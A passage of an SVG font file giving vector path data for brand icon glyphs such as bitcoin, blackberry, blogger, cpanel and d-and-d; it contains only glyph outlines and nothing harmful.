c-0.0283203 0.189453 -0.0517578 0.5 -0.0517578 0.692383c0 2.18555 1.75195 4.22656 3.91211 4.55762h22.25c8.78027 0.879883 11.6396 -6.03027 12.5498 -10.3701l35.7197 -140.83l33.1602 140.83c0.530273 3.21973 2.94043 11.0693 12.7998 10.2393h17.1602
c2.16992 0.180664 11.1104 0.5 12.6807 -10.3691l33.4199 -142.631l36.8701 142.631c0.479492 2.17969 2.71973 11.3691 12.6797 10.3691h19.7197c0.850586 0.130859 6.15039 0.810547 5.25 -8.5791c-0.429688 -1.85059 3.41016 10.6592 -52.75 -169.9
c-1.14941 -5.50977 -4.82031 -11.0898 -12.6797 -10.3701h-18.6904c-10.9395 -1.15039 -12.5098 9.66016 -12.6797 10.75l-33.1602 137.13l-32.7803 -136.99c-0.15918 -1.08984 -1.72949 -11.8994 -12.6797 -10.75h-18.2998v-0.00976562zM538.39 183.92
c-5.87988 -0.00976562 -33.9199 0.299805 -57.3594 12.29c-4.31152 1.8252 -7.81055 7.10645 -7.81055 11.7891v0.121094v10.75c0 8.4502 6.2002 6.89941 8.83008 5.88965c10.04 -4.05957 16.4805 -7.13965 28.8105 -9.59961
c36.6494 -7.53027 52.7695 2.2998 56.7197 4.47949c13.1504 7.81055 14.1895 25.6807 5.25 34.9502c-10.4805 8.79004 -15.4805 9.12012 -53.1299 21c-4.64062 1.29004 -43.7002 13.6104 -43.79 52.3604c-0.610352 28.2402 25.0498 56.1797 69.5195 55.9502
c12.6699 0.00976562 46.4307 -4.13086 55.5703 -15.6201c1.34961 -2.08984 2.01953 -4.5498 1.91992 -7.04004v-10.1104c0 -4.43945 -1.62012 -6.66016 -4.87012 -6.66016c-7.70996 0.860352 -21.3896 11.1699 -49.1602 10.75
c-6.88965 0.360352 -39.8896 -0.910156 -38.4092 -24.9697c-0.430664 -18.96 26.6094 -26.0703 29.6992 -26.8896c36.46 -10.9707 48.6504 -12.79 63.1201 -29.5801c17.1406 -22.25 7.90039 -48.2998 4.35059 -55.4404
c-19.0801 -37.4902 -68.4199 -34.4395 -69.2607 -34.4199zM578.59 79.0596c-70.0303 -51.7197 -171.689 -79.25 -258.49 -79.25c-0.853516 -0.00488281 -2.23926 -0.00976562 -3.09277 -0.00976562c-99.5195 0 -240.271 54.0918 -314.177 120.74
c-6.53027 5.88965 -0.770508 13.96 7.16992 9.46973c81.1748 -46.4336 222.955 -84.1201 316.473 -84.1201h0.407227c69.4072 0.373047 177.64 22.5713 241.59 49.5508c11.7803 5 21.7705 -7.80078 10.1201 -16.3809zM607.78 112.35
c-8.95996 11.5205 -59.2803 5.38086 -81.8105 2.69043c-6.79004 -0.770508 -7.93945 5.12012 -1.79004 9.46973c40.0703 28.1699 105.88 20.1006 113.44 10.6299c7.5498 -9.46973 -2.0498 -75.4092 -39.5605 -106.909c-5.75977 -4.87012 -11.2695 -2.30078 -8.70996 4.09961
c8.44043 21.25 27.3906 68.4902 18.4307 80.0195z" />
    <glyph glyph-name="bimobject" unicode="&#xf378;" 
d="M416 416c17.5996 0 32 -14.4004 32 -32v-384c0 -17.5996 -14.4004 -32 -32 -32h-384c-17.5996 0 -32 14.4004 -32 32v384c0 17.5996 14.4004 32 32 32h384zM352 158.6h-0.0996094v35c0 49.4004 -11.4004 82.5 -103.801 82.5h-17.2998
c-30 0 -65.0996 -8.2998 -69.7002 -38.7998h-1.09961v74.7002h-64v-232h64v34.7998h0.900391c8 -23.8994 26.2998 -38.7998 70.3994 -38.7998h16.9004c92.3994 0 103.8 33.2002 103.8 82.5996zM288 187.5v-22.9004c0 -21.6992 -3.40039 -33.7998 -38.4004 -33.7998h-45.2998
c-28.8994 0 -44.0996 6.5 -44.0996 35.7002v19c0 29.2998 15.2002 35.7002 44.0996 35.7002h45.2998c35 0.200195 38.4004 -12 38.4004 -33.7002z" />
    <glyph glyph-name="bitcoin" unicode="&#xf379;" horiz-adv-x="512" 
d="M504 192c0 -136.967 -111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248s248 -111.033 248 -248zM362.349 227.33c4.9375 32.999 -20.1904 50.7393 -54.5498 62.5732l11.1465 44.7021l-27.2129 6.78027l-10.8516 -43.5234
c-7.1543 1.78223 -14.502 3.46387 -21.8027 5.12988l10.9287 43.8096l-27.1982 6.78125l-11.1523 -44.6855c-5.92188 1.34863 -11.7354 2.68164 -17.377 4.08398l0.0302734 0.139648l-37.5293 9.37012l-7.23926 -29.0625s20.1914 -4.62695 19.7646 -4.91309
c11.0225 -2.75098 13.0146 -10.0439 12.6807 -15.8242l-12.6963 -50.9258c0.759766 -0.193359 1.74414 -0.472656 2.8291 -0.90625c-0.907227 0.224609 -1.87598 0.472656 -2.87598 0.712891l-17.7959 -71.3379c-1.34961 -3.34863 -4.76758 -8.37012 -12.4717 -6.46484
c0.271484 -0.394531 -19.7793 4.9375 -19.7793 4.9375l-13.5107 -31.1475l35.4141 -8.82617c6.58887 -1.65137 13.0449 -3.37988 19.4004 -5.00684l-11.2617 -45.2129l27.1816 -6.78027l11.1533 44.7324c5.96875 -1.61719 15.6846 -4.13867 21.6865 -5.62695
l-11.1152 -44.5225l27.2139 -6.78125l11.2617 45.1279c46.4043 -8.78125 81.2988 -5.23926 95.9863 36.7266c11.8359 33.79 -0.589844 53.2812 -25.0049 65.9912c17.7803 4.09766 31.1748 15.792 34.7471 39.9492zM300.172 140.151
c-8.41016 -33.79 -65.3076 -15.5234 -83.7549 -10.9434l14.9443 59.8994c18.4453 -4.60352 77.5996 -13.7178 68.8105 -48.9561zM308.589 227.818c-7.67285 -30.7363 -55.0312 -15.1201 -70.3926 -11.292l13.5479 54.3262
c15.3633 -3.82715 64.8359 -10.9727 56.8447 -43.0342z" />
    <glyph glyph-name="bity" unicode="&#xf37a;" horiz-adv-x="496" 
d="M78.4004 380.8c95.3994 89.2002 246.1 91.2002 343.1 -3.7998c14.2998 -14.0996 -6.40039 -37.0996 -22.4004 -21.5c-84.7998 82.4004 -215.8 80.2998 -298.899 3.2002c-16.2998 -15.1006 -36.5 8.2998 -21.7998 22.0996zM177.3 -37.7998
c-128.7 38.2998 -201.899 170.7 -169.8 298.1c5.2998 21 35.2002 12.5 30.2002 -7.09961c-28.2998 -111.3 35.2998 -227.101 147.5 -261c21.3994 -6.40039 11.3994 -35.7002 -7.90039 -30zM325.4 -35.7998c-19.2002 -6.2998 -30 22.7002 -8.80078 29.7002
c106.101 35.5 167.4 145.699 143.2 253.399c-4.89941 21.7002 25.5 27.6006 30 7.90039c28.5 -124.101 -42.5 -250.8 -164.399 -291zM262.5 43.2002c0 -8.2002 -6.59961 -14.7998 -14.7998 -14.7998s-14.7998 6.59961 -14.7998 14.7998l0.199219 71.7998
c0 8.09961 6.60059 14.7998 14.8008 14.7998c8.19922 0 14.7998 -6.59961 14.7998 -14.7998zM333.5 312.2c0 21.7998 32.5 19.5996 32.5 0v-71.6006c0 -69.2998 -60.7002 -90.8994 -118 -90.0996c-57.2998 -0.799805 -118 20.7998 -118 90.0996v71.6006
c0 19.5996 32.5 21.7998 32.5 0c-1.40039 -88.2002 -7 -131.8 85.5 -132.5c90.2002 0.599609 87.5996 41.5996 85.5 132.5z" />
    <glyph glyph-name="blackberry" unicode="&#xf37b;" horiz-adv-x="511" 
d="M166 331.1c0 -23.3994 -16.4004 -49.0996 -72.5 -49.0996h-70.0996l21 88.7998h67.7998c42.0996 0 53.7998 -23.2998 53.7998 -39.7002zM292.2 370.8c42.0996 0 53.7998 -23.2998 53.7002 -39.7002c0 -23.3994 -16.3008 -49.0996 -70.1006 -49.0996h-70.0996
l18.7002 88.7998h67.7998zM88.7998 239.9c42.1006 0 53.7998 -23.4004 53.7998 -39.7002c0 -25.7002 -16.3994 -49.1006 -72.5 -49.1006h-70.0996l21 88.8008h67.7998zM268.9 239.9c42 0 53.6992 -23.4004 53.6992 -39.7002c0 -25.7002 -16.2998 -49.1006 -70.0996 -49.1006
h-70.0996l18.6992 88.8008h67.8008zM458.2 293.7c42.0996 0 53.7998 -23.4004 53.7002 -39.7002c0 -25.7002 -16.3008 -49.0996 -70.1006 -49.0996h-70.0996l18.7002 88.7998h67.7998zM430.2 155.8c42.0996 0 53.7002 -23.3994 53.7002 -39.7002
c0 -25.6992 -14 -49.0996 -70.1006 -49.0996h-70.0996l18.7002 88.7998h67.7998zM240.8 102c42.1006 0 53.7998 -23.4004 53.7002 -39.7002c0 -23.3994 -14 -49.0996 -70.0996 -49.0996h-70.1006l18.7002 88.7998h67.7998z" />
    <glyph glyph-name="blogger" unicode="&#xf37c;" horiz-adv-x="447" 
d="M162.4 252c4.7998 4.90039 6.19922 5.09961 36.3994 5.09961c27.2002 0 28.1006 -0.0996094 32.1006 -2.09961c5.7998 -2.90039 8.2998 -7 8.2998 -13.5996c0 -5.90039 -2.40039 -10 -7.60059 -13.4004c-2.7998 -1.7998 -4.5 -1.90039 -31.0996 -2.09961
c-16.4004 -0.100586 -29.5 0.199219 -31.5 0.799805c-10.2998 2.89941 -14.0996 17.7002 -6.59961 25.2998zM223.8 157.5c55.4004 0 55.1006 0 60.4004 -4.7002c7.39941 -7 5.89941 -19.2998 -3.10059 -24.3994l-9.19922 -1.5l-47.9004 -0.600586
c-42.2002 -0.5 -54.0996 0.200195 -56.2998 1.2002c-4.40039 1.90039 -8.5 7.2998 -9.2002 12c-0.599609 4.5 1.59961 10.7998 5.09961 13.9004c4.40039 3.89941 6.30078 4.09961 60.2002 4.09961zM447.2 27.4004c-3.5 -28.4004 -23 -50.4004 -51.1006 -57.5
c-7.19922 -1.80078 -9.69922 -1.90039 -172.899 -1.80078c-157.8 0 -165.9 0.100586 -172 1.80078c-8.40039 2.19922 -15.6006 5.5 -22.2998 10c-5.60059 3.7998 -13.9004 11.7998 -17 16.3994c-3.80078 5.60059 -8.2002 15.2998 -10 22
c-1.80078 6.7002 -1.90039 9.40039 -1.90039 173.4c0 163.1 0 166.6 1.7998 173.7c6.2998 24.6992 25.9004 43.5996 51.2002 49.1992c7.2998 1.60059 332.1 1.90039 340 0.300781c21.2002 -4.30078 37.9004 -17.1006 47.5996 -36.4004c7.7002 -15.2998 7 1.5 7.30078 -180.6
c0.199219 -115.801 0 -164.5 -0.700195 -170.5zM361.8 212.6c-1.09961 5 -4.2002 9.60059 -7.7002 11.5c-1.09961 0.600586 -8 1.30078 -15.5 1.7002c-12.3994 0.600586 -13.7998 0.799805 -17.7998 3.10059c-6.2002 3.59961 -7.89941 7.59961 -8 18.2998
c0 20.3994 -8.5 39.3994 -25.2998 56.5c-12 12.2002 -25.2998 20.5 -40.5996 25.0996c-3.60059 1.10059 -11.8008 1.5 -39.2002 1.7998c-42.9004 0.5 -52.5 -0.399414 -67.1006 -6.19922c-27 -10.7002 -46.2998 -33.4004 -53.3994 -62.4004
c-1.2998 -5.40039 -1.60059 -14.2002 -1.90039 -64.2998c-0.399414 -62.7998 0 -72.1006 4 -84.5c9.7002 -30.7002 37.1006 -53.4004 64.6006 -58.4004c9.19922 -1.7002 122.199 -2.09961 133.699 -0.5c20.1006 2.7002 35.9004 10.7998 50.7002 25.9004
c10.7002 10.8994 17.4004 22.7998 21.7998 38.5c3.2002 10.8994 2.90039 88.3994 1.7002 93.8994z" />
    <glyph glyph-name="blogger-b" unicode="&#xf37d;" 
d="M446.6 225.3c2 -8.89941 2.40039 -134.1 -2.5 -151.7c-7.09961 -25.2998 -17.8994 -44.3994 -35.1992 -62.0996c-23.9004 -24.4004 -49.4004 -37.5 -81.9004 -41.9004c-18.7002 -2.5 -201.2 -1.89941 -216 0.800781c-44.5 8 -88.7998 44.6992 -104.4 94.2998
c-6.2998 20.0996 -7 35 -6.39941 136.5c0.5 81 1 95.0996 3.09961 103.899c11.4004 46.8008 42.6006 83.4004 86.1006 100.601c23.5996 9.39941 39 10.7998 108.399 10c44.2002 -0.5 57.4004 -1.10059 63.2998 -2.90039c24.6006 -7.5 46.2002 -20.7998 65.5 -40.5
c27.1006 -27.5996 40.8008 -58.2998 40.9004 -91.2998c0.0996094 -17.2002 2.7998 -23.5996 12.9004 -29.5c6.39941 -3.7002 8.59961 -4.09961 28.6992 -5c12 -0.5 23.2002 -1.7002 25 -2.7002c5.7002 -3.09961 10.7002 -10.5 12.5 -18.5zM124.5 288.9
c-12.2002 -12.3008 -6 -36.1006 10.5996 -40.8008c3.10059 -0.799805 24.3008 -1.39941 50.8008 -1.19922c43 0.199219 45.6992 0.399414 50.2998 3.2998c8.5 5.39941 12.2998 12.0996 12.2998 21.5996c0 10.6006 -4.09961 17.2002 -13.4004 21.9004
c-6.39941 3.2998 -7.89941 3.39941 -51.7998 3.39941c-48.7998 0 -51 -0.299805 -58.7998 -8.19922zM316.3 89.0996c14.4004 8.2002 17 28.1006 4.90039 39.4004c-8.5 7.90039 -8 7.90039 -97.6006 7.7998c-87.0996 -0.0996094 -90.1992 -0.299805 -97.2998 -6.7002
c-5.59961 -5.09961 -9.2998 -15.0996 -8.2002 -22.3994c1.10059 -7.7002 7.80078 -16.2998 14.9004 -19.4004c3.59961 -1.59961 22.7998 -2.7998 90.9004 -2l77.5 0.900391z" />
    <glyph glyph-name="buromobelexperte" unicode="&#xf37f;" 
d="M0 416h128v-128h-128v128zM120 296v112h-112v-112h112zM160 416h128v-128h-128v128zM280 296v112h-112v-112h112zM320 416h128v-128h-128v128zM440 296v112h-112v-112h112zM0 256h128v-128h-128v128zM120 136v112h-112v-112h112zM160 256h128v-128h-128v128zM280 136v112
h-112v-112h112zM320 256h128v-128h-128v128zM440 136v112h-112v-112h112zM0 96h128v-128h-128v128zM120 -24v112h-112v-112h112zM160 96h128v-128h-128v128zM280 -24v112h-112v-112h112zM320 96h128v-128h-128v128z" />
    <glyph glyph-name="centercode" unicode="&#xf380;" horiz-adv-x="512" 
d="M329.2 179.4c-3.7998 -35.2002 -35.4004 -60.6006 -70.6006 -56.8008c-35.1992 3.80078 -60.5996 35.4004 -56.7998 70.6006s35.4004 60.5996 70.6006 56.7998c35.0996 -3.7998 60.5996 -35.4004 56.7998 -70.5996zM243.4 -55.7002
c-146.7 7.7002 -251.601 138.2 -233.301 279.4c11.2002 86.5996 65.8008 156.899 139.101 192c161 77.0996 349.7 -37.4004 354.7 -216.601c4.09961 -147 -118.4 -262.199 -260.5 -254.8zM423.3 124.3c27.9004 118 -160.5 205.9 -237.2 234.2
c-57.5 -56.2998 -69.0996 -188.6 -33.7998 -344.4c68.7998 -15.7998 169.101 26.4004 271 110.2z" />
    <glyph glyph-name="cloudscale" unicode="&#xf383;" 
d="M318.1 294c6.2002 6.2998 15.8008 -3.09961 9.5 -9.59961l-75.1992 -88.8008c0.899414 -8.19922 -1.80078 -16.7998 -8.10059 -23.0996c-11.0996 -11 -28.8994 -11 -40 0c-11.0996 11.0996 -11.0996 29 0 40c6.2998 6.2998 14.7998 9 23.1006 8.09961l25.1992 20.4004
c-16.3994 15.2998 -38.3994 24.7002 -62.5996 24.7002c-50.7998 0 -94.5996 -41.4004 -92.5996 -97.4004c-1 6.2998 -1.40039 12.7998 -1.40039 19.4004c0 71.5 57.7998 132.3 129.4 132.3c31.7998 0 60.7998 -14.2998 83.2998 -33.5996zM234.3 182.5
c5.60059 5.5 5.60059 14.5996 0 20.2002c-5.59961 5.59961 -14.5996 5.59961 -20.2002 0c-5.59961 -5.60059 -5.59961 -14.6006 0 -20.2002c5.60059 -5.5 14.6006 -5.5 20.2002 0zM224 416c123.5 0 224 -100.5 224 -224s-100.5 -224 -224 -224s-224 100.5 -224 224
s100.5 224 224 224zM224 32c88.2002 0 160 71.7998 160 160s-71.7998 160 -160 160s-160 -71.7998 -160 -160s71.7998 -160 160 -160z" />
    <glyph glyph-name="cloudsmith" unicode="&#xf384;" horiz-adv-x="333" 
d="M332.5 28.0996c0 -46.3994 -37.5996 -84.0996 -84 -84.0996s-84 37.7002 -84 84.0996c0 46.4004 37.5996 84 84 84s84 -37.5996 84 -84zM248.5 272c-46.4004 0 -80 -33.5996 -80 -80s-37.5996 -80 -84 -80s-84 33.5996 -84 80s37.5996 88 84 88s76 29.5996 76 76
s41.5996 84 88 84s80 -37.5996 80 -84s-33.5996 -84 -80 -84z" />
    <glyph glyph-name="cloudversify" unicode="&#xf385;" horiz-adv-x="615" 
d="M148.6 144v-0.0996094h-48.8994c-6.40039 0 -11.7002 5.39941 -11.7002 11.7998v40.3994c0 7.60059 7 11.9004 10.7998 11.9004h46.7998v-6.59961c0 -10.7002 8.80078 -16.7002 19.5 -16.7002h20.2002c10.7998 0 19.5 8.7998 19.5 19.5v20.3994
c0 10.6006 -3.5 19.5 -15.2002 19.5c18.5 15.2002 37.2002 21.4004 45 24.1006c15 56.5 42 92.3994 99.3008 109.7c55.0996 16.5 153.5 3.09961 186.5 -85c73.8994 -22.6006 106.899 -92.6006 92.0996 -155.101c-13 -54.8994 -62.2998 -100.6 -131.5 -99.5
c-49.5996 -51.3994 -135.2 -48.8994 -186.4 -5.59961c-78.5996 -4.2002 -137.8 42.7998 -146 111.3zM376 136c8.7002 -54.0996 59.7002 -65.5 91.7998 -59.2002c39.1006 7.7002 70.5 37.5 79.7002 76.5c5.7998 24.4004 2.40039 50 -9.40039 72l-10.5 19.6006
c1.2002 -22.5 -12.5 -60.6006 -47.5 -76.9004c65.5 67.7002 2.10059 141.2 -67.6992 150.5c-49.8008 6.59961 -83.3008 -13 -114.2 -43.7002c48 -4.7002 87.7002 -26.7998 101.8 -74.7998c-30.0996 49.2998 -103 56.5996 -133.6 40.7998
c-35.5 -18.2002 -60 -54 -57 -93.8994c3.59961 -47.4004 39.5 -67.4004 57.3994 -79.8008c-4.5 21.7002 -4 71.3008 29.2002 92.9004c-36.2998 -60 28.0996 -144.6 135.3 -110.8c-33.5996 14.3994 -66 40.5 -55.2998 86.7998zM128 240h-39.7998
c-8.90039 0 -16.2002 7.2998 -16.2002 16.2002v39.5996c0 8.90039 7.2998 16.2002 16.2002 16.2002h39.7998c8.90039 0 16.2002 -7.2998 16.2002 -16.2002v-39.5996c0 -8.90039 -7.2998 -16.2002 -16.2002 -16.2002zM10.0996 280c-5.59961 0 -10.0996 4.5 -10.0996 10.0996
v27.8008c0 5.59961 4.5 10.0996 10.0996 10.0996h27.7002c5.5 0 10.1006 -4.5 10.1006 -10.0996v-27.8008c0 -5.59961 -4.5 -10.0996 -10.1006 -10.0996h-27.7002zM168 305.3v21.4004c0 5.09961 4.2002 9.2998 9.2998 9.2998h21.4004
c5.09961 0 9.2998 -4.2002 9.2998 -9.2998v-21.4004c0 -5.09961 -4.2002 -9.2998 -9.2998 -9.2998h-21.4004c-5.09961 0 -9.2998 4.2002 -9.2998 9.2998zM56 212.5v-25c0 -6.2998 -5.09961 -11.5 -11.4004 -11.5h-25.1992c-6.30078 0 -11.4004 5.2002 -11.4004 11.5v25
c0 6.2998 5.09961 11.5 11.4004 11.5h25.0996c6.40039 0 11.5 -5.2002 11.5 -11.5z" />
    <glyph glyph-name="cpanel" unicode="&#xf388;" horiz-adv-x="639" 
d="M210.3 227.8c6.60059 -29.0996 -14.5 -65.2998 -51.7002 -65.2998h-32l6.40039 23.7998c1.7998 6.2002 7.2998 10.7998 14.2998 10.7998h10.2998c12.4004 0 20.8008 11.7002 18.3008 22.6006c-2.10059 9.2002 -9.90039 14.7998 -18.3008 14.7998h-19.7998
l-25.7998 -95.7002c-1.90039 -6.2002 -7.40039 -10.7002 -14.2002 -10.7002l-24.7002 -0.0996094l34.9004 130.1c1.7998 6.40039 7.2002 10.9004 14.2998 10.9004h37c24.1006 0 45.4004 -16.4004 51 -41.2002zM53.7998 199.8c-24.8994 0 -24.7002 -37.3994 0 -37.3994
h11.2998c4.2002 0 7.60059 -3.90039 6.40039 -8.30078l-7.09961 -26.0996h-12.4004c-33.5 0 -59 31.4004 -50.2998 65.2002c7.2998 27 28.2998 41.0996 51.2002 41.0996h40l-6.2002 -23.5996c-1.90039 -6.5 -7.40039 -10.9004 -14.2998 -10.9004h-18.6006zM301.3 234.6
c18.7998 0 33.2998 -17.5996 28.5 -36.7998l-14 -51.7998c-2.7998 -10.5996 -12.2002 -17.7998 -23.3994 -17.7998l-57.5 0.200195c-42.9004 0 -38.5 63.7998 0.699219 63.7998h48.4004l-3.5 -13.2002c-1.90039 -6.2002 -7.40039 -10.7998 -14.2002 -10.7998h-21.5996
c-5.2998 0 -5.2998 -7.90039 0 -7.90039h34.8994c4.60059 0 5.10059 3.90039 5.5 5.2998l8.60059 31.8008c0.299805 1 1.89941 5.2998 -2.10059 5.2998h-57.5c-9.69922 0 -16.5996 8.89941 -14.1992 18.5l3.5 13.3994h77.8994zM633.1 269c4.5 0 7.7002 -4 6.5 -8.2998
l-26.5 -98.2002c-5.09961 -20.7002 -24.1992 -34.5 -44.8994 -34.5l35.5996 133.1c1.2002 4.7002 5.5 7.90039 10.4004 7.90039h18.8994zM396.8 234.3c34.4004 0 59.2998 -32.2998 50.2998 -65.3994l-8.7998 -33.1006c-1.2002 -4.89941 -5.7002 -7.7998 -10.2998 -7.7998
h-19.0996c-4.5 0 -7.60059 4 -6.40039 8.2998l10.5996 40c3.30078 11.6006 -5.59961 23.4004 -18.0996 23.4004h-19.7998l-17.2002 -64c-1.2002 -4.7998 -5.59961 -7.7998 -10.4004 -7.7998h-18.8994c-4.2002 0 -7.60059 3.89941 -6.40039 8.2998l26.2002 98h48.2998
v0.0996094zM495.1 159.7h73.3008l-5.7002 -21c-1.90039 -6.2002 -7.40039 -10.7002 -14.2002 -10.7002h-66.7002c-20 0 -33.2998 19 -28.2998 36.7002l10.7998 40c4.7998 17.5996 20.7002 29.5996 38.6006 29.5996h47.2998c19 0 33.2002 -17.7002 28.2998 -36.7998
l-3.2002 -12c-2.89941 -11 -12.7002 -17.5996 -23.2002 -17.5996h-53.3994l3.5 13c1.59961 6.19922 7.2002 10.7998 14.2002 10.7998h21.5996c2 0 3.2998 1 3.90039 3l0.699219 2.59961c0.700195 2.7002 -1.2998 5.10059 -3.89941 5.10059h-32.9004
c-4.09961 0 -6.89941 -2.10059 -7.7998 -6l-8 -30c-0.900391 -3.30078 1.5 -6.7002 5.09961 -6.7002z" />
    <glyph glyph-name="css3-alt" unicode="&#xf38b;" horiz-adv-x="384" 
d="M0 416h384l-34.9004 -395.8l-157.1 -52.2002l-157.1 52.2002zM313.1 336h-242.199l5.7998 -47.2998h122.899l-6.5 -2.7002l-112.1 -46.7002l3.59961 -46.2998l0.200195 0.0996094v-0.0996094l166.3 -0.5l-3.69922 -61.5996l-54.7002 -15.4004l-52.6006 13.2998
l-3.19922 38.2998h-48.9004l6.40039 -73.8994l98.7998 -29.2002l98.2002 28.7002l12.7998 146.6h-111.5l0.299805 0.100586l115.3 49.2998z" />
    <glyph glyph-name="cuttlefish" unicode="&#xf38c;" horiz-adv-x="431" 
d="M344 142.5c13.7002 -50.9004 41.7002 -93.2998 87 -117.8c-45.2998 -49.6006 -110.5 -80.7002 -183 -80.7002c-137 0 -248 111 -248 248s111 248 248 248c72.5 0 137.7 -31.0996 183 -80.7002c-45.2998 -24.5 -73.2998 -66.8994 -87 -117.8
c-17.5 31.5996 -57.4004 54.5 -96 54.5c-56.5996 0 -104 -47.4004 -104 -104s47.4004 -104 104 -104c38.5996 0 78.5 22.9004 96 54.5z" />
    <glyph glyph-name="d-and-d" unicode="&#xf38d;" horiz-adv-x="575" 
d="M82.5 349.1c-0.599609 17.2002 2 33.8008 12.7002 48.2002c0.299805 -7.39941 1.2002 -14.5 4.2002 -21.5996c5.89941 27.5 19.6992 49.2998 42.2998 65.5c-1.90039 -5.90039 -3.5 -11.7998 -3 -17.7002c8.7002 7.40039 18.7998 17.7998 44.3994 22.7002
c14.7002 2.7998 29.7002 2 42.1006 -1c38.5 -9.2998 61 -34.2998 69.7002 -72.2998c5.2998 -23.1006 0.699219 -45 -8.30078 -66.4004c-5.19922 -12.4004 -12 -24.4004 -20.6992 -35.0996c-2 1.89941 -3.90039 3.7998 -5.80078 5.59961
c-42.7998 40.7998 -26.7998 25.2002 -37.3994 37.4004c-1.10059 1.19922 -1 2.19922 -0.100586 3.59961c8.30078 13.5 11.8008 28.2002 10 44c-1.09961 9.7998 -4.2998 18.9004 -11.2998 26.2002c-14.5 15.2998 -39.2002 15 -53.5 -0.600586
c-11.3994 -12.5 -14.0996 -27.3994 -10.8994 -43.5996c0.199219 -1.2998 0.399414 -2.7002 0 -3.90039c-3.40039 -13.6992 -4.60059 -27.5996 -2.5 -41.5996c0.0996094 -0.5 0.0996094 -1.09961 0.0996094 -1.59961c0 -0.300781 -0.0996094 -0.5 -0.200195 -1.10059
c-21.7998 11 -36 28.2998 -43.2002 52.2002c-8.2998 -17.7998 -11.0996 -35.5 -6.59961 -54.0996c-15.5996 15.1992 -21.2998 34.2998 -22 55.1992zM552.1 225.9c0.5 -0.600586 1.2002 -1 1.7002 -1.40039v-0.5c-15 3.59961 -29.7998 1.7998 -44.5 -1.2998
c-9.2998 -2 -18.2998 -4.7002 -26.7002 -9c-2.89941 -1.5 -5.69922 -3.2998 -8 -4.7002c-5.7998 2.40039 -11.2998 5.5 -17.1992 6.7998c-24.5 5.2998 -45.8008 -1.2002 -62.5 -20c-19.7002 -22.2002 -34.5 -47.5996 -46.7002 -74.5l-1.2002 -2.7002
c-0.0996094 -0.199219 -0.200195 -0.299805 -0.400391 -0.399414c-12.0996 8.2998 -21.5996 20.2998 -36.0996 25.5996c0.299805 0.400391 0.400391 0.900391 0.700195 1.2998c20.5996 28.2002 44.8994 52.5 75.0996 70.4004c16 9.5 33 16.0996 51.5 18.5
c1.7998 0.200195 3.5 0.400391 5.2998 1.09961c-4.39941 0 -8.7998 0.300781 -13.0996 -0.0996094c-21.2002 -1.90039 -40.5 -9.59961 -58.7002 -20.2002c-13.7998 -8 -26.2002 -17.7002 -36.5996 -29.7998c-0.400391 -0.5 -0.600586 -1.09961 -0.900391 -1.7002
c-0.299805 0.299805 -0.700195 0.600586 -1 0.900391c11 30.8994 30.7002 55 57.7002 73.2998c0.200195 -0.200195 0.5 -0.299805 0.700195 -0.5c-1.2002 -1.7002 -2.5 -3.2998 -3.5 -5.09961c-1.7998 -3.30078 -3.7002 -6.5 -5.10059 -10
c-1.7998 -4.30078 1.60059 -8.60059 12 -0.5c18.2002 14.0996 29.6006 26.2998 48.9004 29.5996c0.700195 0.0996094 1.2998 0.299805 1.90039 0.299805h2.5c-1 -0.700195 -1.60059 -1.09961 -2.2002 -1.5c-11.6006 -7.7998 -11.7998 -7.39941 -15 -12
c-2.60059 -3.7002 -0.200195 -8 4.7002 -6.7998c2.59961 0.599609 5.19922 1.2998 7.69922 2.2002c9.40039 3.2998 19 5.7998 29 6.39941c13.9004 0.800781 27.1006 -1.89941 39.9004 -7.09961c15.0996 -6.2002 28.5 -15 40.0996 -26.5996zM316.7 50.4004
c1.5 -1.30078 1.89941 -2.40039 0.899414 -4.2002c-25.2998 -50.2002 -61.0996 -89.1006 -116 -98.7998c-26.7998 -4.7002 -52.8994 -2.7002 -77.8994 8.59961c-18.5 8.2002 -34.6006 19.5996 -47.2002 35.5996c-2 2.60059 -3.7002 5.40039 -5.90039 8.60059
c-0.699219 -7.7998 0.100586 -14.9004 1.5 -21.9004c-0.199219 -0.200195 -0.399414 -0.299805 -0.599609 -0.5c-3.2002 3.40039 -6.59961 6.60059 -9.5 10.2998c-12.2002 15.5 -19.5 33.3008 -24.0996 52.3008c-11.8008 48.2998 -0.5 78.7998 7.7998 101.1
c-8.7002 -4.7998 -16.2002 -10.2998 -23.6006 -16.2002c11.6006 32.7998 31.9004 59.9004 56.1006 84.6006c2.39941 -2.10059 3.2998 -4.7002 3 -7.40039c-0.200195 -1 -5.90039 -38.9004 -5.60059 -44.7002c18.9004 18.9004 40.5 33.2998 64.8008 43.9004
c-7.5 -11.1006 -11 -23.4004 -11.8008 -37.2998c13.4004 12.1992 27.7002 20.0996 46.4004 13.8994c-8.5 -9.09961 -30.7998 -30.5 -38.5996 -64.2998c-5.10059 -21.9004 -3.80078 -43.0996 8.19922 -62.5996c11.2002 -18.3008 27.8008 -27.8008 49.4004 -27.8008
c12.5996 0 23.7998 5 34.0996 11.8008c18.5 12.2998 32.8008 28.5 44 47.5996c1.90039 3.2002 1.10059 2.09961 1.90039 3c19.9004 -16.0996 3.2998 -2.59961 42.7002 -35.5996zM488.7 96.7998c20.2002 -6.59961 35.5 -18.7998 43.7998 -38.8994
c9.2002 -23.1006 2.09961 -49.4004 -17.4004 -66c-16.3994 -14 -35.6992 -19.2002 -57 -17.4004c-0.599609 0 -1.19922 0 -1.89941 -0.299805c15.0996 -10.7002 31.5996 -15.2002 50.8994 -10.6006c-2.19922 -2.39941 -3.89941 -4.69922 -5.89941 -6.5
c-12.2998 -10.8994 -26.9004 -16.8994 -42.9004 -19.7998c-39.5996 -7.2998 -75.5996 12.7998 -85 56.9004c-0.5 2.09961 -0.599609 4.2002 -0.899414 6.39941c-10.8008 -8.19922 -16.4004 -34.0996 -0.700195 -52.2998c-1.60059 0.5 -2.60059 0.700195 -3.60059 1.10059
c-21.2998 8.2998 -34.3994 28.2998 -33.5 51.1992c0.900391 23.2002 4.90039 41 -13 56c-16.5 13.8008 -33 27.4004 -49.5 41.1006c-8.09961 6.7002 -14.7998 14.5 -17 25.0996c-1 4.60059 -1.39941 9.40039 -1.7998 14.1006c-0.5 6.09961 -3.2998 11 -7.89941 14.7998
c-4.5 3.89941 -9.30078 7.39941 -13.8008 11.2002c-8.89941 7.5 -12.2998 18.8994 -7.2998 29.8994c2.7998 -12.8994 9.60059 -18.8994 22.6006 -20.2998c4.39941 -0.5 8.89941 -0.799805 13.2998 -1.5c8.09961 -1.2002 12.7998 -6.09961 14.2998 -14.2002
